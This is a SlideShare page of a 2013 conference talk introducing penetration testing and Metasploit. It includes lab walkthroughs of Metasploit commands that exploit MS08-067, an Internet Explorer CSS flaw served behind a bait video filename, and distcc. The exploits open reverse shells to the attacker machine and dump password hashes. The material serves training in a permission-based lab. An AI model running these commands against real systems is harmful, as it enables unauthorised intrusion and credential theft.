Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.
PENETRATIONTESTINGAND METASPLOITBASIC Presented by Syarif ! Indonesia Creative Open Source Software ( ICrOSS ) 2013 ...
Agenda • Why & What’s Penetration Testing ( Pentest ) • << back|track basic overview • Information Gathering & Port Sc...
Whoami • Just me my self : http://fl3x.us ; @fl3xu5 • InfoSec Enthusiast & Trainer • Lecture & Assistant Manager • Cyb...
Why Pentest ? • Millions of dollars have been invested in security programs to protect critical infrastructure to prevent ...
What’s Penetration Testing • A method to evaluate the security of computer system / network • Practice ( attacking ) an ...
Ethics • Think before act • Don’t be stupid • Don’t be malicious
Pentest Phases Vulnerability Analysis Information Gathering Exploitation Post Exploitation Reporting
<< back|track overview • . The Most Advanced Linux Security Distribution Open Source & Always be Developed for Security Pr...
<< back|track overview • Watch theVideo ! :)
<< back|track overview
<< back|track overview
What’s • Not just a tool, but an entire framework *1) • an Open source platform for writing security tools and exploits ...
Metasploit interfaces • MSFconsole • MSFcli • msfweb, msfgui ( discontinued ) • Metasploit Pro, Metasploit Expres...
MSFconsole
MSFcli
Metasploit Terminology • Exploit : code that allow a pentester take some advantages of a flaw within system,application,...
How does exploitation works attacker exploit + payload vulnerable server 1 exploit run , then payload run 2 3 Upload / Dow...
Traditional PentestVs Metasploit Public Exploit Gathering Change offsets Replace ShellCode Load Metasploit Choose the targ...
Meterpreter • as a payload after vulnerability is exploited *1) • Improve the post exploitation
Meterpreter Exploiting a vulnerability Select a meterpreter as a payload meterpreter shell
Meterpreter command
Meterpreter command
Meterpreter command
Meterpreter command
Meterpreter command
Pentest Scenario attacker vulnerable OS onVMware * : Ubuntu 8.04 metasploitable *
Pentest Skenario • Set network adapter : NAT • Firewall & Windows update : OFF • Fresh OS installed ! • startx
OS in the Lab • BackTrack 5 R 3 • IP address : 172.16.150.169 • Windows Xp SP 2 • IP address : 172.16.150.165 • Wi...
Windows XP Exploitation • msf > search windows/smb • msf > info exploit/windows/smb/ms08_067_netapi • msf > use exploi...
Windows XP Post Exploitation • session -i 1 • meterpreter > getsystem -h • getuid • hashdump
Windows 2003 Server Exploitation • msf > search windows/smb • msf > info exploit/windows/smb/ms08_067_netapi • msf > u...
Windows 7 Exploitation • msf > use exploit/windows/browser/ms11_003_ie_css_import • msf exploit(ms11_003_ie_css_import) ...
Windows 7 Exploitation • msf exploit(ms11_003_ie_css_import) > sessions -l • msf exploit(ms11_003_ie_css_import) > sessi...
Ubuntu 8.04 Metasploitable Exploitation • search distcc • use exploit/unix/misc/distcc_exec • show payloads • set PA...
Any Question ? Contact me • Website : http://fl3x.us • Twitter : @fl3xu5
Greet & Thanks To • BackTrack Linux • Metasploit Team ( HD Moore & rapid7 ) • Offensive Security / Metasploit Unleashe...
References ! ! • 1. Metasploit The Penetration Tester’s Guide : David Kennedy , Jim O’Gorman, Devon Kearns, Mati Aharoni ...
Challenge in 45 minutes :) • ConnectYour Windows OS to TP LINK Access Point over dhcp • BackTrack 5R3VMWare setting : ...
Challenge in 45 minutes :)
Upcoming SlideShare
Loading in …5
×
Technology
13,607 views
Jul. 14, 2013

iCrOSS 2013_Pentest

[Slide] iCrOSS 2013_Pentest

Related Books

Free with a 30 day trial from Scribd

See all
Bezonomics: How Amazon Is Changing Our Lives and What the World's Best Companies Are Learning from It Brian Dumaine
(4.5/5)
Free
No Filter: The Inside Story of Instagram Sarah Frier
(4.5/5)
Free
The Future Is Faster Than You Think: How Converging Technologies Are Transforming Business, Industries, and Our Lives Peter H. Diamandis
(5/5)
Free
SAM: One Robot, a Dozen Engineers, and the Race to Revolutionize the Way We Build Jonathan Waldman
(5/5)
Free
So You Want to Start a Podcast: Finding Your Voice, Telling Your Story, and Building a Community That Will Listen Kristen Meinzer
(5/5)
Free
Everybody Lies: Big Data, New Data, and What the Internet Can Tell Us About Who We Really Are Seth Stephens-Davidowitz
(4/5)
Free
Life After Google: The Fall of Big Data and the Rise of the Blockchain Economy George Gilder
(4/5)
Free
Autonomy: The Quest to Build the Driverless Car—And How It Will Reshape Our World Lawrence D. Burns
(5/5)
Free
Future Presence: How Virtual Reality Is Changing Human Connection, Intimacy, and the Limits of Ordinary Life Peter Rubin
(4/5)
Free
From Gutenberg to Google: The History of Our Future Tom Wheeler
(2/5)
Free
Talk to Me: How Voice Computing Will Transform the Way We Live, Work, and Think James Vlahos
(3/5)
Free
Live Work Work Work Die: A Journey into the Savage Heart of Silicon Valley Corey Pein
(4/5)
Free
Carrying the Fire: 50th Anniversary Edition Michael Collins
(4.5/5)
Free
Ninety Percent of Everything: Inside Shipping, the Invisible Industry That Puts Clothes on Your Back, Gas in Your Car, and Food on Your Plate Rose George
(4/5)
Free
Coming Back Alive: The True Story of the Most Harrowing Search and Rescue Mission Ever Attempted on Alaska's High Seas Spike Walker
(4.5/5)
Free
Island of the Lost: An Extraordinary Story of Survival at the Edge of the World Joan Druett
(4/5)
Free

Related Audiobooks

Free with a 30 day trial from Scribd

See all
Einstein's Fridge: How the Difference Between Hot and Cold Explains the Universe Paul Sen
(4.5/5)
Free
The Science of Time Travel: The Secrets Behind Time Machines, Time Loops, Alternate Realities, and More! Elizabeth Howell
(3.5/5)
Free
Liftoff: Elon Musk and the Desperate Early Days That Launched SpaceX Eric Berger
(5/5)
Free
If Then: How the Simulmatics Corporation Invented the Future Jill Lepore
(4.5/5)
Free
Uncanny Valley: A Memoir Anna Wiener
(4/5)
Free
An Ugly Truth: Inside Facebook’s Battle for Domination Sheera Frenkel
(4/5)
Free
The Players Ball: A Genius, a Con Man, and the Secret History of the Internet's Rise David Kushner
(4.5/5)
Free
Bitcoin Billionaires: A True Story of Genius, Betrayal, and Redemption Ben Mezrich
(4.5/5)
Free
Ten Arguments for Deleting Your Social Media Accounts Right Now Jaron Lanier
(4/5)
Free
User Friendly: How the Hidden Rules of Design Are Changing the Way We Live, Work, and Play Cliff Kuang
(4/5)
Free
Digital Renaissance: What Data and Economics Tell Us about the Future of Popular Culture Joel Waldfogel
(3.5/5)
Free
Blockchain: The Next Everything Stephen P Williams
(4/5)
Free
Lean Out: The Truth About Women, Power, and the Workplace Marissa Orr
(4/5)
Free
A World Without Work: Technology, Automation, and How We Should Respond Daniel Susskind
(4.5/5)
Free
Batavia's Graveyard: The True Story of the Mad Heretic Who Led History's Bloodiest Mutiny Mike Dash
(4.5/5)
Free
Console Wars: Sega, Nintendo, and the Battle That Defined a Generation Blake J. Harris
(4/5)
Free
no profile picture user

  • Be the first to comment

iCrOSS 2013_Pentest

  1. 1. PENETRATIONTESTINGAND METASPLOITBASIC Presented by Syarif ! Indonesia Creative Open Source Software ( ICrOSS ) 2013 Jakarta, April 25 2013 Balai Kartini
  2. 2. Agenda • Why & What’s Penetration Testing ( Pentest ) • << back|track basic overview • Information Gathering & Port Scan ( Demo) • Metasploit Basics & Meterpreter • Challenge ;)
  3. 3. Whoami • Just me my self : http://fl3x.us ; @fl3xu5 • InfoSec Enthusiast & Trainer • Lecture & Assistant Manager • CyberCrime Investigator
  4. 4. Why Pentest ? • Millions of dollars have been invested in security programs to protect critical infrastructure to prevent data breaches *1) • Penetration Test is one of the most effective ways to identify weaknesses and deficiencies in these programs *1)
  5. 5. What’s Penetration Testing • A method to evaluate the security of computer system / network • Practice ( attacking ) an IT System like a ‘hacker’ does • Find security holes ( weaknesses ) • Bypass security mechanism • Compromise an organization’s IT system security Must have permission from IT system owner ! illegal activity put you in Jail
  6. 6. Ethics • Think before act • Don’t be stupid • Don’t be malicious
  7. 7. Pentest Phases Vulnerability Analysis Information Gathering Exploitation Post Exploitation Reporting
  8. 8. << back|track overview • . The Most Advanced Linux Security Distribution Open Source & Always be Developed for Security Professional Real World Pentesting Tools
  9. 9. << back|track overview • Watch theVideo ! :)
  10. 10. << back|track overview
  11. 11. << back|track overview
  12. 12. What’s • Not just a tool, but an entire framework *1) • an Open source platform for writing security tools and exploits *2) • Easily build attack vectors to add its exploits, payloads, encoders, • Create and execute more advanced attack • Ruby based
  13. 13. Metasploit interfaces • MSFconsole • MSFcli • msfweb, msfgui ( discontinued ) • Metasploit Pro, Metasploit Express • Armitage
  14. 14. MSFconsole
  15. 15. MSFcli
  16. 16. Metasploit Terminology • Exploit : code that allow a pentester take some advantages of a flaw within system,application, or service *1) • Payload : code that we want the target system to execute ( few commands to be executed on the target system ) *1) • Shellcode : a set of instructions used as payload when exploitation occurs *1) • Module : a software that can be used by metasploit *1) • Listener : a component for waiting an incoming connection *1)
  17. 17. How does exploitation works attacker exploit + payload vulnerable server 1 exploit run , then payload run 2 3 Upload / Download data
  18. 18. Traditional PentestVs Metasploit Public Exploit Gathering Change offsets Replace ShellCode Load Metasploit Choose the target OS Use exploit SET Payload Execute Traditional Pentest Metasploit for Pentest
  19. 19. Meterpreter • as a payload after vulnerability is exploited *1) • Improve the post exploitation
  20. 20. Meterpreter Exploiting a vulnerability Select a meterpreter as a payload meterpreter shell
  21. 21. Meterpreter command
  22. 22. Meterpreter command
  23. 23. Meterpreter command
  24. 24. Meterpreter command
  25. 25. Meterpreter command
  26. 26. Pentest Scenario attacker vulnerable OS onVMware * : Ubuntu 8.04 metasploitable *
  27. 27. Pentest Skenario • Set network adapter : NAT • Firewall & Windows update : OFF • Fresh OS installed ! • startx
  28. 28. OS in the Lab • BackTrack 5 R 3 • IP address : 172.16.150.169 • Windows Xp SP 2 • IP address : 172.16.150.165 • Windows 2003 Server • IP address : 172.16.150.167 • Windows 7 • IP address : 172.16.150.170 • Ubuntu Linux 8.04 ( Metasploitable ) • IP address : 172.16.150.171
  29. 29. Windows XP Exploitation • msf > search windows/smb • msf > info exploit/windows/smb/ms08_067_netapi • msf > use exploit/windows/smb/ms08_067_netapi • msf exploit(ms08_067_netapi) > show payloads • msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp • msf exploit(ms08_067_netapi) > show options • msf exploit(ms08_067_netapi) > set RHOST 172.16.150.165 • msf exploit(ms08_067_netapi) > set LHOST 172.16.150.169 • msf exploit(ms08_067_netapi) > show options • msf exploit(ms08_067_netapi) > exploit • meterpreter > background • session -l
  30. 30. Windows XP Post Exploitation • session -i 1 • meterpreter > getsystem -h • getuid • hashdump
  31. 31. Windows 2003 Server Exploitation • msf > search windows/smb • msf > info exploit/windows/smb/ms08_067_netapi • msf > use exploit/windows/smb/ms08_067_netapi • msf exploit(ms08_067_netapi) > show payloads • msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp • msf exploit(ms08_067_netapi) > show options • msf exploit(ms08_067_netapi) > set RHOST 172.16.150.167 • msf exploit(ms08_067_netapi) > set LHOST 172.16.150.169 • msf exploit(ms08_067_netapi) > show options • msf exploit(ms08_067_netapi) > exploit • meterpreter > background • session -l
  32. 32. Windows 7 Exploitation • msf > use exploit/windows/browser/ms11_003_ie_css_import • msf exploit(ms11_003_ie_css_import) > set PAYLOAD windows/meterpreter/reverse_tcp • msf exploit(ms11_003_ie_css_import) > show options • msf exploit(ms11_003_ie_css_import) > set SRVHOST 172.16.150.169 • msf exploit(ms11_003_ie_css_import) > set SRVPORT 80 • msf exploit(ms11_003_ie_css_import) > set URIPATH miyabi-hot.avi • msf exploit(ms11_003_ie_css_import) > set LHOST 172.16.150.169 • msf exploit(ms11_003_ie_css_import) > set LPORT 443 • msf exploit(ms11_003_ie_css_import) > exploit Just wait until the victim open the url http://172.16.150.169:80/miyabi-hot.avi
  33. 33. Windows 7 Exploitation • msf exploit(ms11_003_ie_css_import) > sessions -l • msf exploit(ms11_003_ie_css_import) > sessions -i 1 • meterpreter > sysinfo • meterpreter > shell
  34. 34. Ubuntu 8.04 Metasploitable Exploitation • search distcc • use exploit/unix/misc/distcc_exec • show payloads • set PAYLOAD cmd/unix/reverse • show options • set rhost 172.16.150.171 • set lhost 172.16.150.169 • exploit
  35. 35. Any Question ? Contact me • Website : http://fl3x.us • Twitter : @fl3xu5
  36. 36. Greet & Thanks To • BackTrack Linux • Metasploit Team ( HD Moore & rapid7 ) • Offensive Security / Metasploit Unleashed • David Kennedy • Georgia Weidman
  37. 37. References ! ! • 1. Metasploit The Penetration Tester’s Guide : David Kennedy , Jim O’Gorman, Devon Kearns, Mati Aharoni • 2. http://www.metasploit.com • 3. http://www.offensive-security.com/metasploit- unleashed/Main_Page • 4. http://www.pentest-standard.org/index.php/ PTES_Technical_Guidelines
  38. 38. Challenge in 45 minutes :) • ConnectYour Windows OS to TP LINK Access Point over dhcp • BackTrack 5R3VMWare setting : • Network adapter : Bridge • Get 4 Pictures by your self & shutdown the targets ( if you can :p ) • Win the Polo T-Shirt indobacktrack
  39. 39. Challenge in 45 minutes :)

    Be the first to comment

    Login to see the comments

  • fahmiidris11

    Jan. 27, 2017

  • EjderHakanAtlkarnca

    Aug. 16, 2018

  • hteixe

    Jun. 19, 2019

[Slide] iCrOSS 2013_Pentest

Views

Total views

13,607

On Slideshare

0

From embeds

0

Number of embeds

11,616

Actions

Downloads

90

Shares

0

Comments

0

Likes

3

×